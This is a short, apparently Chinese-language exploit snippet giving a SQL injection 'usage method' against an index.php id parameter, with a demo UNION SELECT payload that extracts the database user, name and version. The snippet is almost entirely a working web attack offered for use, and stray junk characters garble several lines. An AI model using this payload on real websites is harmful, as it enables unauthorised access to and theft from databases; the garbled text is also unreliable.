利用方法:$ _; N) I& o) u8 ^, X. o' p3 o
http://www.xxx.com/index.php?id=[SQL]% }1 [( [1 k; F, Z
Demo:9 G" ]0 I. Q* F* h" l
http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |